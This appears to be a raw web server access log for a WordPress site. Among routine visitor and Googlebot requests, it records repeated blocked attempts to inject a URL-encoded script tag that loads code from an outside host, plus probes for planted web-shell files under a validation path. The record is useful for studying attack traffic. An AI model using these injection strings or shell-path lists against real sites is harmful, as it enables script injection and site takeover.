196.251.80.216 - - [03/May/2025:04:38:27 +0330] "GET /aowjtshj.php?Fox=d3wL7 HTTP/1.1" 301 0 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
172.191.111.212 - - [03/May/2025:04:53:38 +0330] "GET /wp-content/uploads/2020/12/logo2.png HTTP/1.1" 200 4490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
94.130.143.102 - - [03/May/2025:04:58:54 +0330] "GET /wp-content/themes/realestate-7/style.css HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
94.102.49.19 - - [03/May/2025:05:09:23 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
185.12.250.58 - - [03/May/2025:05:13:03 +0330] "GET /robots.txt HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
94.102.49.19 - - [03/May/2025:05:04:46 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
93.158.95.213 - - [03/May/2025:05:13:09 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
66.249.64.128 - - [03/May/2025:05:18:53 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.49.19 - - [03/May/2025:05:19:31 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:05:37:38 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:05:37:39 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
43.157.38.131 - - [03/May/2025:05:41:30 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
94.102.49.19 - - [03/May/2025:05:37:03 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:05:48:53 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:05:48:56 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
31.214.174.196 - - [03/May/2025:06:10:57 +0330] "GET /.well-known/pki-validation/ HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:06:11:59 +0330] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:06:12:03 +0330] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:06:12:20 +0330] "GET /.well-known/pki-validation/xmrlpc.php HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:06:12:27 +0330] "GET /.well-known/pki-validation/sx.php HTTP/1.1" 404 796 "-" "get_local:DCV"
66.249.64.128 - - [03/May/2025:06:18:04 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
31.214.174.196 - - [03/May/2025:06:11:10 +0330] "GET /.well-known/pki-validation/wp-admin/ HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:06:11:19 +0330] "GET /.well-known/pki-validation/file.php HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:06:11:20 +0330] "GET /.well-known/pki-validation/top.php HTTP/1.1" 404 796 "-" "get_local:DCV"
58.49.233.126 - - [03/May/2025:06:21:32 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
